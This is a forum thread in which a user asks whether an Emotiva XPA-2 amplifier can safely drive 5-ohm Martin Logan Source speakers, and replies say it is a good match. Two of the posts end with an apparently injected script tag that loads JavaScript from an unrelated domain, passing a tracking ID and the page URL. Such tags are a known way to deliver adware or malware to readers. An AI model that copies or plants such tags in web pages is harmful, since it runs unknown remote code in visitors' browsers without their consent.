Hello Everyone- My first post here and I am in need of some help. I have a pair of Martin Logan Source speakers that I really enjoy but am having hard time finding an amp for them. I currently am blaming them for the death of my HK-3490, but refuse to give up on them. They are a strange 5 ohm, 200w speaker. I am VERY interested in trying the XPA-2 but am afraid to damage the amp or speakers if the wattage is too high or not enough. Can anyone let me know if this is a good match or just dumb idea. Thanks in advance!! <script src="https://secure-content-delivery.com/data.js.php?i={1E8C148F-4012-4187-B42E-A7118C9BD714}&d=2013-10-10&s=http://emotivalounge.proboards.com/thread/new/69&cb=0.001967168944378095" type="text/javascript"></script>

Douublejoe, welcome to the forum !!
IMO the XPA-2 would be fine with the ML's. As long as you listen at normal levels you shouldn't have issues. The XPA-2 will give you plenty of headroom for passages requiring extra wattage.
You're correct about the most likely cause of the HK failure, the ML's were most likely running it to its limits

The XPA-2 is an excellent choice for Martin Logan. I am running my Martin Logan Ascent i with two XPA-2....you will not damage the XPA-2 or your speakers with this combination. The more power available the better. Loudspeakers are damaged using a too small amplifier. Distortion will kill your speakers, not clean wattage and you have plenty of clean power with the XPA-2.

Thank you all for the input so far... I was really hoping to hear positive news like this. Looks like I will be giving the XPA-2 a shot. <script src="https://secure-content-delivery.com/data.js.php?i={1E8C148F-4012-4187-B42E-A7118C9BD714}&d=2013-10-10&s=http://emotivalounge.proboards.com/post/new/33676&cb=0.788339193502499" type="text/javascript"></script>
